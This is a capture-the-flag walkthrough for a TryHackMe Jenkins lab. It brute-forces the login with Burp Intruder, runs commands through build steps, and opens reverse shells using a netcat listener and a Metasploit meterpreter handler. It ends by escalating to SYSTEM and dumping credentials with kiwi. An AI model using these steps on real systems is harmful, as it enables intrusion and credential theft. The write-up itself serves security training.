We will start off by enumerating the provided host for common web ports using the browser (80,8080,443)
Port 80 returns a relatively empty web page:
Port 8080 returns a Jenkins login page
Port 443 returns nothing. Lets focus on the login form. When submitting credentials, you’ll notice the application throws an error: Invalid username or password
Lets use that error to set up a brute force attack. You can use Hydra if you’d like, but I’m going to show you how to do it with burp.
Intercept login request and send to intruder
Select “Clusterbomb” as your attack type
Modify referrer to point to http://10.10.170.185:8080/login
Select the j_username and j_password parameter data, and click the “Add” button
In the “Payloads” tab:
Set payload 1 as simple list, and add your userlist (I used a common cred list)
Set payload 2 as simple list, and add your pass list
Options tab:
Under GREP — MATCH, add your error string
Change “Follow redirections” to “Always”
Start the attack
When the attack is complete, you should get a 200 response as well as the PGREP being unchecked for one set of creds. Lets use those to log in
While playing around with some of the features, you’ll notice that the project configuration section allows you to run an arbitrary commands during build. In this case, we’ll do a simple directory list
dir
Now, just click “Save”, and then “Build Now” on the left hand side of the page
Under permalinks, select the latest build and view the results under “Console Output”
Sweet, it worked. Now lets try to execute a reverse shell using the payload given by TryHackMe. First, set up an http server to serve up the indicated file by navigating to the scripts directory and entering the following:
python3 -m http.server 1337
Then, lets open a different terminal, and set up a netcat listener
nc -nvlp 1338
Now, lets go ahead and execute the given payload by putting the payload in the build’s command window, and building the file
Success! Now, lets read that user.txt file. In this case, the file appears to be on Bruce’s desktop.
Now, we need to somehow escalate privileges. We can go several routes with this, but I’m going to choose the most simple…. With meterpreter. So lets create a reverse tcp shell and upload it the same way we uploaded the powershell file. First, lets set up a listener in Metasploit so that we can leverage metasploits features
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.240.85
set lport 4444
exploit -j -z
Now lets create, upload and invoke the payload
Got eem!
Now, we only have bruces permissions. So lets try a “getsystem” command in meterpreter…
Alternatively, we can use incognito to escalate our privileges by using token impersonation as indicated on the TryHackMe guide for this machine. Now, lets migrate into a 64 bit process with SYSTEM privs. Identify your process, identify a 64 bit system process, then migrate.
getpid
ps
migrate 668
Perfect. So before I attempt to read the flag as indicated by TryHackMe, I’m going to see if I can get credentials from memory
load kiwi
creds_all
After noting his password, I am now going to go ahead and drop into a shell and try to read the root flag
Sweet! We have completed this lab. Naturally, you may want to consider doing some more post-exploitation and also see if your discovered creds could be put to good use. As for me, I’m grabbing a beer!